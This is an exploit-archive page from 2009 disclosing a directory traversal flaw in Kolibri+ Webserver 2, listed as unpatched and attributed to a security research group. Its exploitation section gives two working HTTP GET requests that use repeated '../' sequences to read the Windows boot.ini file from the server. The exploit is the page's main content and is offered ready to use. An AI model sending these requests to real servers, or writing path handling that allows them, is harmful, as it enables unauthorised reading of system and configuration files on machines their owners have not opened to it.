Kolibri+ Webserver 2 Directory Traversal Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kolibri+ Webserver 2 Directory Traversal Vulnerability
# Published : 2009-09-11
# Author : Usman Saeed
# Previous Title : Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability
# Next Title : Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Directory Traversal Vulnerability
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :


          [Directory Traversal]

GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0

# www.Syue.com [2009-09-11]